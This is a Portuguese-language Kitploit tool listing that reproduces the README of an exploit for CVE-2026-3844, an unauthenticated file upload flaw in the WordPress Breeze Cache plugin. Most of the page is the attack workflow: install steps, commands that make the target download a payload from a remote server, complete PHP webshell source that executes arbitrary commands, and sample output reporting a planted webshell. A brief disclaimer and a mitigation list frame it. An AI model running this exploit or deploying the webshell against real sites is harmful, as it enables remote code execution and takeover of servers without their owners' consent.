Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - Upload Arbitrário de Arquivo Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - Upload Arbitrário de Arquivo Não Autenticado

Ver Repositório
11há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - Upload Arbitrário de Arquivos Não Autenticado

MIT License Python 3.6+ WordPress


⚠️ Aviso Legal

root@kitploit:~
ESTA FERRAMENTA É FORNECIDA APENAS PARA FINS EDUCACIONAIS E DE PESQUISA EM SEGURANÇA.
O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em
sistemas que você possui ou para os quais tenha permissão explícita de teste. O autor não se
responsabiliza por qualquer uso indevido ou dano causado por este software.

📋 Descrição

CVE-2026-3844 é uma vulnerabilidade crítica de upload arbitrário de arquivos não autenticado no plugin Breeze Cache para WordPress (versões ≤ 2.4.4). O plugin falha ao validar corretamente o parâmetro srcset em comentários, permitindo que atacantes remotos enviem arquivos maliciosos (incluindo webshells) para o servidor.

🔴 Severidade

  • Pontuação CVSS: 9.8 (Crítica)
  • Vetor de Ataque: Rede
  • Autenticação Necessária: Não
  • Impacto: Execução Remota de Código (RCE)

🎯 Versões Afetadas

  • Breeze Cache ≤ 2.4.4
  • WordPress todas as versões (dependente do plugin)

🔧 Detalhes Técnicos

A vulnerabilidade explora a funcionalidade de cache de Gravatar no Breeze. Quando um comentário é postado com um parâmetro srcset especialmente elaborado contendo uma URL de arquivo remoto, o Breeze baixa e armazena o arquivo localmente em:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[marcador_aleatório][extensão_do_arquivo]

Pré-requisito: A opção "Hospedar Arquivos Localmente - Gravatars" deve estar habilitada nas configurações do Breeze.

🚀 Instalação

root@kitploit:~
# Clonar o repositório
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# Instalar dependências
pip install pycurl termcolor

💻 Uso

Uso Básico

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

Opções Avançadas

root@kitploit:~
# Verificar se o alvo é vulnerável sem exploração
python3 CVE-2026-3844.py -u http://target.com --check-only

# Usar URL de payload personalizada
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# Salvar saída em arquivo
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# Aumentar timeout para alvos lentos
python3 CVE-2026-3844.py -u http://target.com --timeout 30

Argumentos de Linha de Comando

ArgumentoDescrição
-u, --urlURL do alvo (obrigatório)
-p, --payloadURL do payload remoto
--timeoutTimeout da requisição em segundos (padrão: 15)
--check-onlyApenas verificar se o alvo é vulnerável
-o, --outputSalvar URL do shell em arquivo

📝 Exemplo de Payload Personalizado

Crie seu próprio webshell (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Hospede-o em algum lugar acessível e depois use:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 String de Verificação

O exploit verifica automaticamente a string de verificação 4356452d323032362d33383434 (hex codificado de "CVE-2026-3844") no arquivo enviado para confirmar a exploração bem-sucedida.

🛡️ Mitigação

  1. Atualize o Breeze Cache para a versão 2.4.5 ou superior
  2. Desative "Hospedar Arquivos Localmente - Gravatars" se não for necessário
  3. Implemente regras de Firewall de Aplicação Web (WAF)
  4. Audite regularmente a funcionalidade de comentários

📸 Captura de Tela

root@kitploit:~
[*] FASE 1: AVALIAÇÃO DE VULNERABILIDADE
[*] Verificando versão do plugin Breeze...
[+] Alvo VULNERÁVEL (Breeze v2.4.4)

[*] FASE 2: EXPLORAÇÃO
[!] REQUISITO: 'Hospedar Arquivos Localmente - Gravatars' DEVE ESTAR HABILITADO
[*] Passo 1: Enviando comentário malicioso...
[+] Comentário postado com sucesso
[*] Passo 2: Aguardando o Breeze armazenar o arquivo em cache...
[*] Passo 3: Verificando arquivo enviado...
[+] Arquivo encontrado em: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] STRING DE VERIFICAÇÃO ENCONTRADA - EXPLORAÇÃO BEM-SUCEDIDA!

[✓] STATUS: SUCESSO
[✓] URL DO WEBSHELL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 Estrutura de Diretórios

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Script principal do exploit
├── README.md            # Este arquivo
└── LICENSE              # Licença MIT

📄 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.

🙏 Créditos

  • Autor: 0xgh057r3c0n
  • Descoberta: Equipe de pesquisa em segurança
  • ID CVE: CVE-2026-3844

📞 Contato

  • GitHub: @0xgh057r3c0n
  • Reportar problemas: GitHub Issues

⭐ Suporte

Se você achar esta ferramenta útil, por favor dê uma estrela ⭐ no GitHub!


Feito com 🐍 Python | Apenas para fins educacionais
Baixar ferramenta